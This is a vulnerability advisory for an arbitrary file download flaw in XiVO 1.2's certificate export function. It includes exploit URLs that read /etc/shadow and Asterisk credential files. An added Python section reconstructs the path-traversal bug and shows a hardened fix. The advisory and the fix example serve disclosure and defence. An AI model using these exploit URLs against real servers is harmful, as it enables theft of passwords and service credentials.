
Xivo 1.2 Arbitrary File Download - Web Security - 自学php

Xivo 1.2 Arbitrary File Download under root privileges

Author: Mr.Un1k0d3r

Vendor: https://wiki.xivo.fr

Download URL: https://wiki.xivo.fr/index.php/XiVO_1.1-Gallifrey/Install_XiVO_With_CD

Affected version: 1.2 (the latest patched release at the time of writing)

 

Description:

The certificate export action of the web configuration interface (manage/certificate/?act=export) uses the id parameter as a filesystem path without validating it, so any file on the system can be downloaded through the web interface. Because the web application runs as root, file permissions offer no protection.

This exposes /etc/passwd, /etc/shadow, and Asterisk configuration files that hold clear-text credentials, such as /etc/asterisk/manager.conf (AMI users and secrets) and /etc/asterisk/cel_pgsql.conf (PostgreSQL connection password), among many others.

 

Exploitation:

https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=etc/passwd

https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=etc/shadow

https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=etc/asterisk/manager.conf

https://server-ip/xivo/configuration/index.php/manage/certificate/?act=export&id=etc/asterisk/cel_pgsql.conf
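The following is an added example, not XiVO's code and not part of the original advisory. It reconstructs the class of bug behind the description and the URLs above: a request parameter spliced into a file path with no validation, beside a hardened handler that allowlists the identifier syntax and confirms the resolved path stays inside the certificate store. The store directory, the file names and the `safe_export`/`vulnerable_export` functions are assumptions for illustration; the advisory's URLs pass paths without a leading slash, which suggests the real application concatenated the id onto the filesystem root, so the example also shows that `os.path.join` silently discards the base directory when the attacker supplies an absolute path.

```python
import os
import re
import tempfile


def vulnerable_export(store_dir: str, cert_id: str) -> bytes:
    """Hypothetical reconstruction of the flawed pattern: the request's id
    is spliced into a filesystem path with no validation. os.path.join()
    discards store_dir entirely when cert_id starts with "/", and "../"
    segments walk out of the store, so any file the process can read is
    served (everything, when the process runs as root)."""
    with open(os.path.join(store_dir, cert_id), "rb") as f:
        return f.read()


# Allowlist for certificate identifiers: no slashes, no dots, bounded length.
CERT_ID = re.compile(r"[A-Za-z0-9_-]{1,64}")


def safe_export(store_dir: str, cert_id: str) -> bytes:
    """Hardened form: reject anything but a plain identifier, append the
    extension ourselves, then verify the realpath (symlinks followed)
    still lies inside the store before opening it."""
    if not CERT_ID.fullmatch(cert_id):
        raise PermissionError(f"rejected certificate id: {cert_id!r}")
    store = os.path.realpath(store_dir)
    target = os.path.realpath(os.path.join(store, cert_id + ".pem"))
    if os.path.commonpath([store, target]) != store:
        raise PermissionError(f"path escapes certificate store: {target}")
    with open(target, "rb") as f:
        return f.read()


def demo() -> dict:
    """Build a throwaway layout (constructed sample data, not real files)
    and exercise both handlers with one legitimate id and hostile ones."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        store = os.path.join(root, "store")
        os.mkdir(store)
        with open(os.path.join(store, "cert1.pem"), "wb") as f:
            f.write(b"-----BEGIN CERTIFICATE-----\n")
        # A sensitive file outside the store, standing in for /etc/shadow.
        secret = os.path.join(root, "shadow")
        with open(secret, "wb") as f:
            f.write(b"root:$6$fake$hash:19000:0:99999:7:::\n")

        results["vuln_legit"] = vulnerable_export(store, "cert1.pem")
        # Traversal out of the store and an absolute path both succeed.
        results["vuln_traversal"] = vulnerable_export(store, "../shadow")
        results["vuln_absolute"] = vulnerable_export(store, secret)

        results["safe_legit"] = safe_export(store, "cert1")
        for label, hostile in (("safe_traversal", "../shadow"),
                               ("safe_absolute", secret),
                               ("safe_slash", "etc/passwd")):
            try:
                safe_export(store, hostile)
                results[label] = "served"
            except PermissionError:
                results[label] = "rejected"
    return results


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The syntactic allowlist alone would already block every URL in the advisory; the realpath containment check is kept as a second layer because it also catches symlinks planted inside the store and any future code path that builds the name differently. Neither check helps if the process still runs as root, so the fix for this class of bug is two-sided: validate the path and drop the privileges that made the leak total.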

 

Discovered by Mr.Un1k0d3r from the RingZer0 Team.

 

Notes:

This appears to have been fixed.

 
